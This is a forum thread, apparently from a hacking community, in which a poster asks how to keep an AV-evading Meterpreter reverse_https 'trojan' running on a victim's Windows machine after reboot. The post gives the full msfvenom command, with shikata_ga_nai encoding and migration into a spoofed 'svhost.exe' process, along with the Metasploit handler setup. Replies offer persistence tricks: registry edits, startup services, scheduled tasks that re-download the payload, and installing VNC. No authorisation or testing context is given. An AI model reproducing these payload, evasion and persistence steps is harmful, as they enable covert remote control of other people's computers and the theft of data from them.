Jump to content

Meterpreter reverse_https session lost upon restart (shortcut method)


Recommended Posts

So I've created an .exe using reverse_https meterpreter shell code and it's undetectable. However, all of meterpreter's persistence methods resulted in the AV going off, so I decided to use NSIS to make an installer for my trojan. This does get detected by a few AVs, but it's as close to undetectable as I could get and still have persistence. It copies the .exe somewhere else and creates a shortcut in the user's startup folder so that the .exe is run upon sign in. However, meterpreter does not start a when the session is lost, and upon sign-in, nothing happens. The old session is still open, but unresponsive. I know that the .exe is run upon log-in because when I manually close the session, and then listen, it will pick up a new session.

How do I maintain access by using the shortcut method? Also, is there a better way to maintain persistence without NSIS? Using NSIS seems silly. I want the .exe to immediately have persistence without connecting back and then have metasploit tell it to do something.

Here is the shell code that I'm using:

msfvenom -p windows/meterpreter/reverse_https lhost=xxxx lport=xxxx PrepenMigrate=true PrependMigrateProc=svhost.exe -b '\x00\xff' -e x86/shikata_ga_nai -i 3 -f c

This is what I type when I start metasploit on Kali:

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set SessionCommunicationTimeout 0
Link to comment
Share on other sites

I'm not so sure nsis is necessary... you can use the meterprwter to upload files or write files to the destination folder... place a meterpreterin the startup folder...

You can use rc scripts with the exploit handler to automate meterpreter commands. When a shell is first established this rc script would execute...

from the meterpreter shell have you tried to modify the registry? Attempt to make a startup service... will this setoff the AV?

you have to keep trying new things, and take note of whAt Works...

Link to comment
Share on other sites

Sheduled tasks, environmental variables, aliases.

You can always write a scheduled task to check if your payload is running if not, start it, stop it, delete it, download and install a new version of the payload.

Maybe install a legitimate remote access tool on the machine. VNC or whatever.

Link to comment
Share on other sites

  • 3 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
  • Create New...